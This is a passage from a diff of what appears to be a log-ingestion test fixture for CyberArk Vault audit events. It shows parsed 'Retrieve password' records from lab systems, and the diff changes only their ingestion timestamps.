\u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.3\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eAIM password request\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Nobody\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"295\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Prov_PVWA\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.3\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"AIM password request\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Nobody\"}]}}}}", "code": "295", "kind": "event", @@ -168,7 +168,7 @@ "event": { "severity": 2, "reason": "(Action: Show Password)", - "ingested": "2021-12-09T13:36:45.560097600Z", + "ingested": "2021-12-14T14:42:10.855175168Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.6\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Show Password)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cRetrieveAction\u003eShow Password\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.2.0.3\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"295\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.6\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Show Password)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"RetrieveAction\":\"Show Password\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"10.2.0.3\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "295", "kind": "event", @@ -262,7 +262,7 @@ "event": { "severity": 2, "reason": "testing", - "ingested": "2021-12-09T13:36:45.560103300Z", + "ingested": "2021-12-14T14:42:10.855175610Z", "original": "\u003c5\u003e1 2021-03-08T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:16:51\",\"IsoTimestamp\":\"2021-03-08T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\testobject\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"testing\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"test\"},{\"Name\":\"Address\",\"Value\":\"test\"},{\"Name\":\"CPMDisabled\",\"Value\":\"testing\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "295", "kind": "event", @@ -368,7 +368,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-12-09T13:36:45.560112Z", + "ingested": "2021-12-14T14:42:10.855176015Z", "original": "\u003c5\u003e1 2021-03-08T19:19:59Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:19:59\",\"IsoTimestamp\":\"2021-03-08T19:19:59Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"26\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615231182\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614785704\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "295", "kind": "event", @@ -454,7 +454,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-12-09T13:36:45.560117600Z", + "ingested": "2021-12-14T14:42:10.855176509Z", "original": "\u003c5\u003e1 2021-03-08T19:20:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:02\",\"IsoTimestamp\":\"2021-03-08T19:20:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615198782\"},{\"Name\":\"CurrInd\",\"Value\":\"2\"}]}}}}", "code": "295", "kind": "event", @@ -556,7 +556,7 @@ "event": { "severity": 2, "reason": "Application provider background refresh job", - "ingested": "2021-12-09T13:36:45.560123100Z", + "ingested": "2021-12-14T14:42:10.855176903Z", "original": "\u003c5\u003e1 2021-03-10T14:40:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 06:40:37\",\"IsoTimestamp\":\"2021-03-10T14:40:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Application provider background refresh job\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "295", "kind": "event", @@ -651,7 +651,7 @@ "event": { "severity": 2, "reason": "test", - "ingested": "2021-12-09T13:36:45.560128600Z", + "ingested": "2021-12-14T14:42:10.855177295Z", "original": "\u003c5\u003e1 2021-03-10T18:27:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:27:57\",\"IsoTimestamp\":\"2021-03-10T18:27:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMAdmin\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"test\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMAdminConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", @@ -746,7 +746,7 @@ "event": { "severity": 2, "reason": "test", - "ingested": "2021-12-09T13:36:45.560134100Z", + "ingested": "2021-12-14T14:42:10.855177785Z", "original": "\u003c5\u003e1 2021-03-10T18:28:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:28:07\",\"IsoTimestamp\":\"2021-03-10T18:28:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"test\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", @@ -852,7 +852,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-12-09T13:36:45.560139700Z", + "ingested": "2021-12-14T14:42:10.855178265Z", "original": "\u003c5\u003e1 2021-03-10T23:39:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:22\",\"IsoTimestamp\":\"2021-03-10T23:39:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"24\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615419536\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614868762\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "295", "kind": "event", @@ -938,7 +938,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-12-09T13:36:45.560145600Z", + "ingested": "2021-12-14T14:42:10.855178743Z", "original": "\u003c5\u003e1 2021-03-10T23:39:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:25\",\"IsoTimestamp\":\"2021-03-10T23:39:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615387136\"},{\"Name\":\"CurrInd\",\"Value\":\"1\"}]}}}}", "code": "295", "kind": "event", @@ -1034,7 +1034,7 @@ "event": { "severity": 2, "reason": "lksajdflkasdf", - "ingested": "2021-12-09T13:36:45.560151200Z", + "ingested": "2021-12-14T14:42:10.855179148Z", "original": "\u003c5\u003e1 2021-03-11T16:41:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:41:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:41:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMAdmin\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003elksajdflkasdf\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMAdminConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"169.254.180.25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"VAGRANT-2012-R2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:41:21\",\"IsoTimestamp\":\"2021-03-11T16:41:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMAdmin\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"lksajdflkasdf\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMAdminConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", @@ -1128,7 +1128,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:45.560174600Z", + "ingested": "2021-12-14T14:42:10.855179742Z", "original": "\u003c5\u003e1 2021-03-11T16:50:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMServer\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"169.254.180.25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"VAGRANT-2012-R2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:28\",\"IsoTimestamp\":\"2021-03-11T16:50:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", @@ -1222,7 +1222,7 @@ "event": { "severity": 2, "reason": "sdfsdf", - "ingested": "2021-12-09T13:36:45.560180100Z", + "ingested": "2021-12-14T14:42:10.855180150Z", "original": "\u003c5\u003e1 2021-03-11T16:54:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:54:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:54:20Z\u003c/IsoTimestamp\u003e\\n 